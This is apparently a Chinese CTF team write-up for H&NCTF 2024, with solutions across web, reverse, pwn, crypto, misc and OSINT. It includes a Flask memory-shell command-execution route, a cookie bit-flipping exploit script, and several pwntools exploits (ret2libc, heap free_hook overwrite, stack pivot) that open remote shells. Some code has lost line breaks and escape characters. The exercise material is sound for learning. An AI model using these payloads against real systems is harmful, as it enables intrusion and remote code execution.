WEB
Please_RCE_Me
请求体最后面写一个ukfc: /flag flag的正则匹配用全大写绕过 task=readfile(end(getallheaders()));&fIag=PLEASE GIVE ME FLAG
ezFlask
一眼打内存马。
app.add_url_rule(‘/test’,’test’,lambda:__import__(‘os’).popen(request.args.get(‘cmd’)).read())
之后访问/test?cmd=cat+/flag。
ez_tp
附件源码里
AppRuntimeLogsHome24_04_17.log 日志里最后有sql查询语句payload,直接输入即可
flipPin
bit-flipping attacks
https://github.com/tamuctf/tamuctf-2024/tree/bd8e28c70054ee391b3d4bc2c845481ef0869fba/web/flipped
import requestsfrom base64 import b64decode, b64encodeurl = "http://hnctf.imxbt.cn:port/"default_session = '{"admin": 0, "username": "user1"}'res = requests.get(url)c = bytearray(b64decode(res.cookies["session"]))c[default_session.index("0")] ^= 1evil = b64encode(c).decode()#绕黑名单url1 = "http://hnctf.imxbt.cn:port/read?filename=/proc/1/cpuset"res1 = requests.get(url1, cookies={"session": evil})print(res1.text)
读文件,算pin,进/console
>import subprocess>print(subprocess.getoutput('env'))
RE
Ezshoping
藏在re里面的web题 难评
修改money即可
Maybe_xor
命令行读取base64后直接解密再发送
from pwn import *import base64def decrypt(text):aa=texttmp = list (base64.b64decode (aa))p = 0aa = []# 320for i in range (2,len (tmp)):if tmp [i - 2] == 0x8d and tmp [i - 1] == 0x35:tel = (tmp [i]) | (tmp [i + 1] << 8)if tmp [i + 3] == 0xff:p = i + 4 - (0xffff - tel) - 1else:p = i + 4 + telbreakfor i in range (2,len (tmp)):if tmp [i - 2] == 0xc and tmp [i - 1] == 0x34:aa.append (tmp [i])decrypted_text=""for i in range (p,p + 24):if (aa [i - p] ^ tmp [i]) == 0:decrypted_text+="00"# print ("00")continueif (aa [i - p] ^ tmp [i]) <= 0xf:decrypted_text += "0"# print ("0",end = '')decrypted_text+=hex(aa [i - p] ^ tmp [i])[2:]# print ("{:x}".format (aa [i - p] ^ tmp [i]),end = '')return decrypted_textcontext.os = 'linux'context.log_level = 'debug'io = remote('hnctf.imxbt.cn',49306)def recvString():io.recvuntil(b'ELF: ')string = (io.recvuntil(b'n'))[:-1].decode()return stringdef sendString(string):io.recvuntil(b'Bytes?')io.sendline(string.encode())def sendExample():a = recvString()io.recvuntil(b'Expected bytes: ')b = (io.recvuntil(b'n'))[:-1].decode()sendString(b)sendExample()##############for i in range(0,127):aa=recvString()bb=decrypt(aa)sendString(bb)##############io.interactive()
baby_obvbs
简单的vbs混淆 用vbs_defuscator解掉
Function Initialize(strPwd)Dim box(256)Dim tempSwapDim aDim bFor i = 0 To 255box(i) = iNextFunction Myfunc(strToHash)Dim tmpFile, strCommand, objFSO, objWshShell, outSet objFSO = CreateObject("Scripting.FileSystemObject")Set objWshShell = CreateObject("WScript.Shell")tmpFile = objFSO.GetSpecialFolder(2).Path & "" & objFSO.GetTempNameobjFSO.CreateTextFile(tmpFile).Write(strToHash)strCommand = "certutil -hashfile " & tmpFile & " MD5"out = objWshShell.Exec(strCommand).StdOut.ReadAllobjFSO.DeleteFile tmpFileMyfunc = Replace(Split(Trim(out), vbCrLf)(1), " ", "")End FunctionFunction EnCrypt(box, strData)Dim tempSwapDim aDim bDim xDim yDim encryptedDataencryptedData = ""For x = 1 To Len(strData)a = (a + 1) Mod 256b = (b + box(a)) Mod 256tempSwap = box(a)box(a) = box(b)box(b) = tempSwapy = Asc(Mid(strData, x, 1)) Xor box((box(a) + box(b)) Mod 256)encryptedData = encryptedData & LCase(Right("0" & Hex(y), 2))NextEnCrypt = encryptedDataEnd Functionmsgbox "Do you know VBScript?"msgbox "VBScript (""Microsoft Visual Basic Scripting Edition"") is a deprecated Active Scripting language developed by Microsoft that is modeled on Visual Basic."msgbox "It allows Microsoft Windows system administrators to generate powerful tools for managing computers without error handling and with subroutines and other advanced programming constructs. It can give the user complete control over many aspects of their computing environment."msgbox "Interestingly, although VBScript has long since been deprecated, you can still run VBScript scripts on the latest versions of Windows 11 systems."msgbox "A VBScript script must be executed within a host environment, of which there are several provided with Microsoft Windows, including: Windows Script Host (WSH), Internet Explorer (IE), and Internet Information Services (IIS)."msgbox "For .vbs files, the host is Windows Script Host (WSH), aka wscript.exe/cscript.exe program in your system."msgbox "If you can not stop a VBScript from running (e.g. a dead loop), go to the task manager and kill wscript.exe/cscript.exe."msgbox "cscript and wscript are executables for the scripting host that are used to run the scripts. cscript and wscript are both interpreters to run VBScript (and other scripting languages like JScript) on the Windows platform."msgbox "cscript is for console applications and wscript is for Windows applications. It has something to do with STDIN, STDOUT and STDERR."msgbox "OK! Now, let us begin our journey."key = InputBox("Enter the key:", "CTF Challenge")if (key = False) then wscript.quitif (len(key)<>6) thenwscript.echo "wrong key length!"wscript.quitend ifIf (Myfunc(key) = ANtg) Thenwscript.echo "You get the key!Move to next challenge."Elsewscript.echo "Wrong key!Try again!"wscript.quitEnd IfuserInput = InputBox("Enter the flag:", "CTF Challenge")if (userInput = False) then wscript.quitif (len(userInput)<>44) thenwscript.echo "wrong!"wscript.quitend ifbox = Initialize(key)encryptedInput = EnCrypt(box, userInput)If (encryptedInput = eAqi) ThenMsgBox "Congratulations! You have learned VBS!"ElseMsgBox "Wrong flag. Try again."End Ifwscript.echo "bye!"
key给了md5值,六位直接上hashcat爆破,简单rc4解密即可
childmaze
啥都不管直接动调 首先搜索到success的逻辑,修改eip直接到达成功位置让他打印flag
隐藏的眼睛
是个病毒分析 无视危险直接动调
第一次运行将自己藏在video文件夹下,第二次运行跟到关键函数
拿到flag
最喜欢的逆向题
buffer[5]=105 找105对应的就行
do you know swdd?
Smc 动调查看逻辑后解密即可
int main(){char aa[]="S_VYFO_CGNN_GRKD_KLYED_IYE";for (int j=0;j<strlen(aa);j++){if (aa[j]=='_'){printf("_");continue;}for (int i='A';i<='Z';i++) {if (aa[j]==((i + 10 - 65) % 26 + 65)) {printf("%c",i);break;}}}return 0;}
hnwanna
用dnspy打开 简单解密
int main(){char aa[]="justaeasyunitygame";for (int j=0;j<strlen(aa);j++){printf("%c",(((aa[j] - 'a') + 5) % 26 + 97));}return 0;}
PWN
Idea
1、开局checksec,32位没pie,还告诉了版本
2、vuln一看,将V1输入负数后可以进行栈溢出,之后就是无脑溢出了,但是调试的过程有点怪,需要进行
多次调整
Exp
from pwn import *from LibcSearcher import *context(os='linux',arch='i386',log_level='debug')ifremote=1if ifremote==1:io=remote('hnctf.imxbt.cn',38378)else:io=process('/home/kali/Downloads/idea')elf = ELF('/home/kali/Downloads/idea')#gdb.attach(io)payload=b'%7$p'io.recvuntil(b'How many bytes do you want me to read? ')io.sendline(b'-32')io.recvuntil(b"Ok, sounds good. I'll give u a gift!n")io.sendline(payload)io.recvuntil(b'0x')canary=int(io.recvuntil(b'G')[:-1],16)print("canary==================>",hex(canary))puts_plt=elf.plt['puts']puts_got=elf.got['puts']payload=b'a'*0x20+p32(canary)+b'aaaa'*3+p32(puts_plt)+p32(0x804870D)+p32(puts_got)io.recvuntil(b' data!n')io.sendline(payload)puts_addr=u32(io.recvuntil(b'xf7')[-4:])print("puts_addr=============>",hex(puts_addr))payload=b'%7$p'io.recvuntil(b'How many bytes do you want me to read? ')io.sendline(b'-32')io.recvuntil(b"Ok, sounds good. I'll give u a gift!n")io.sendline(payload)base_addr=puts_addr-0x05f150system_addr=base_addr+0x03a950binsh_addr=base_addr+0x15912bpayload=payload=b'a'*0x20+p32(canary)+b'aaaa'*3+p32(system_addr)+p32(0x804870D)+p32(binsh_addr)io.recvuntil(b' data!n')io.sendline(payload)io.interactive()
What
多申请一些chunk, 发现sizelist和chunklist重叠了,size可溢出原size,堆溢出,2.27打freehook取shell
from pwn import *p=remote('hnctf.imxbt.cn',port)#p=process("./what")elf=ELF("./what")context.log_level='debug'libc=elf.libcdef cmd(idx):p.sendlineafter(b'Enter your command:',str(idx))def add(idx):cmd(1)p.sendlineafter(b'size:',str(idx))def delete():cmd(2)def show(idx):cmd(3)p.sendlineafter(b'se enter idx:',str(idx))def edit(idx,cnt):cmd(4)p.sendlineafter(b'er idx:',str(idx))sleep(3)p.sendlineafter(b'Please enter your content:',cnt)add(0x68)add(0x420)add(0x68)for i in range(16):add(0xfff)for i in range(16):delete()delete()delete()add(0x420)show(1)p.recvuntil(b'ent:')libc_base=u64(p.recv(6).ljust(8,b'x00'))-libc.symbols['__malloc_hook']-96-0x10print('----->',hex(libc_base))edit(0,b'a'*0x68+p64(0x431)+b'x00'*0x428+p64(0x71)+p64(libc_base+libc.symbols['__free_hook']-8))add(0x68)add(0x68)edit(3,b'/bin/shx00'+p64(libc_base+libc.symbols['system']))p.interactive()
Close
这道题会直接执行 system(‘/bin/sh’) 爆金币,但是把 fd 为 1 的 stdout 关掉了,我们 cat flag 看不见了,怎么办呢?
我们可以把 cat flag 的输出重定向到 fd 为 2 的 stderr ,这样我们就看到回显啦。
cat flag > &2ez_pwn
看一下保护:32位,无 PIE 和 Canary , GOT 可改,简直能吊着打。
这道题的 vuln 函数有两次输入,两次都可以输入的大小均为 48 ,填满大小为 40 的变量 s 后还可以覆写 rbp 上的值和返回地址。
我们可以在第一次输入填满 s 顺带泄露 rbp 上的栈地址,确定栈上输入位置的相对偏移,把 /bin/sh 输到栈上,然后随便拿个野生的 leave;retn ,我们便可以在第二次输入的时候来一次栈迁移。
不过这题无敌了,跳转函数的位置找对了, /bin/sh 的偏移却不对,这题的偏移太鬼畜,调试的过程让人难泵。
EXP:
from pwn import *context(os = 'linux',arch ='amd64',log_level = 'debug')#io = process('./ez_pwn')io = remote('103.8.69.140',42351)#elf = ELF('./ez_pwn')payload1 = b'a' * (44 - 1) + b'n'io.sendafter(b'name',payload1)io.recvuntil(payload1)leakstack_addr = u32(io.recv(4))print(hex(leakstack_addr))puts_plt=0x80483F0leave_ret = 0x8048637system_plt = 0x8048400hack_addr = 0x8048566inputstack_addr = leakstack_addr - 0x3cpayload2 = (b'shx00x00'+ p32(system_plt) + p32(inputstack_addr) + p32(inputstack_addr + 0x8)).ljust(44,b'a') + p32(inputstack_addr + 0x4)io.send(payload2)io.interactive()
CRYPTO
BabyPQ
from z3 import *n= 111062058535162164984738836722967570966613906169432119952622928416997120106420704969085000793236763239688932646444218230300216706798108324937797855830637153017419446619484868441764669690727579779099567694199763164730314171397195403162134843973164325220857213018410963127358399705331729543773388617561557740781phin= 111062058535162164984738836722967570966613906169432119952622928416997120106420704969085000793236763239688932646444218230300216706798108324937797855830637131484098271088612965442194315038048171911247107215251247008707944522314305941884323954755887627723714550317505603859341783252342756873595331720023643277564add = n-phin+1x = Real('x')y = Real('y')s = Solver()s.add(x*y==n,x+y==add)print(s.check())print(s.model())
MISC
secret
给了一个png,需要两种方法去拆它
注意到末尾结尾为l<9l0kl10n88j:8<特征
属于Our Secret(文档加密)
利用Steganography工具解密得到以下txt(无需密码)
谢太傅寒雪日内集,与儿女讲论文义。俄而雪骤,公欣然曰:“白雪纷纷何所似?”兄子胡儿曰:“撒盐空中差可拟。”兄女曰:“未若柳絮因风起。”公大笑乐。即公大兄无奕女,左将军王凝之妻也。
“为若柳絮因风起”显然是暗示雪,snow加密,但是不知道密钥。
第二次拆包用binwalk拆,得到以下字符串flag is not here!
在记事本打开后长度和视觉明显不符,属于零宽隐写。
利用cyberchef的escape unicode characters解开
发现这里面仅有200b 200d 202c和FEFF,利用
https://330k.github.io/misc_tools/unicode_steganography.html
密钥是”Snow White”
利用snow解密工具解密得到txt
内容为:
兑震乾兑乾坤乾艮乾兑兑艮兑乾震兑乾坎兑艮乾兑乾艮乾艮巽兑离震兑坎坤兑乾艮兑坎离兑兑巽兑艮离兑震兑兑坎震兑离离兑兑离兑坤乾兑艮离兑兑坎兑兑震兑艮巽兑坎坤兑兑巽兑艮兑兑艮乾兑离艮兑兑坤兑坎艮兑乾离兑离巽兑兑坎兑兑离兑艮坤兑艮乾兑离乾兑巽兑兑坤乾兑艮离兑兑巽兑艮兑兑艮乾兑离艮兑离乾兑巽离兑坎坤乾坎震
利用八卦解密脚本
def to8bArr(baguaStr):code = {'乾': '0', #'兑': '1', #'离': '2', #'震': '3', #'巽': '4', #'坎': '5', #'艮': '6', #'坤': '7', #}bArr = []temp = []# 把八卦符转为8进制数字for s in baguaStr:temp.append(code[s])print(temp)tempStr = ''# 数字3个一组 组合回八进制for i in range(len(temp)):tempStr += temp[i]if i % 3 == 2:bArr.append('0o' + tempStr)tempStr = ''for i in bArr:print(chr(int(i, base=8)),end='')to8bArr('兑震乾兑乾坤乾艮乾兑兑艮兑乾震兑乾坎兑艮乾兑乾艮乾艮巽兑离震兑坎坤兑乾艮兑坎离兑兑巽兑艮离兑震兑兑坎震兑离离兑兑离兑坤乾兑艮离兑兑坎兑兑震兑艮巽兑坎坤兑兑巽兑艮兑兑艮乾兑离艮兑兑坤兑坎艮兑乾离兑离巽兑兑坎兑兑离兑艮坤兑艮乾兑离乾兑巽兑兑坤乾兑艮离兑兑巽兑艮兑兑艮乾兑离艮兑离乾兑巽离兑坎坤乾坎震')
解得类base64字符串:
XG0NCEpF4SoFjLrYkRJxrMKtoLqpVOnBTMJwpPaxrLqpVPbo+
这里不得不提,确实问了下出题人说非常简单,但是简单在哪呢,后面其实是反向找的。
到这已经没有悬念了,发现前面多加了个X
也就是把X去掉然后base64解一下就出来了
ManCraft – 娱乐题
进入服务器,提示击杀“牢大“获得flag,提示钻石兑换武器“直升机”,牢大是普通僵尸改数值。
挂载CheatUtils By Zergatul MOD
修改攻击距离为6,启用自动攻击,免疫跌落伤害,拉一个牢大到合适位置(地下矿洞没人的地方),直接空手打死获得flag。
osint
22号飞的,不知道在哪,把所有热门机场都撞了一遍,最后发现是海口美兰国际机场,然后对时间去查所有当天晚上飞到海口的航班,很快能确定是HU7006
查询HU7006航线以及起飞降落机场,ZGGG广州白云机场到ZJHK海口美兰。
在广州白云机场周边没有找到图中地点。
查询ZJHK海口美兰机场进场、进近航图。推测飞行路线为DOMGO进入进场程序,到达HK430航路点进入进近程序。
图示飞机推测处于进近阶段,在HK404航路点与机场跑道之间寻找。
结合飞机朝向跑道降落,右侧观察,找到地点。
osint_pro
-
21号长城杯,看提示应该是贵州师范打的,那就是22号贵阳龙洞堡飞北京
-
绕着黄河找,看见了山西圣天湖景区,中午能发图片肯定是转机了,结合图片大概率是运城转机
然后查航班就出了
欢迎进qq群讨论
原文始发于微信公众号(UKFC安全):UKFC2024 H&NCTF WP
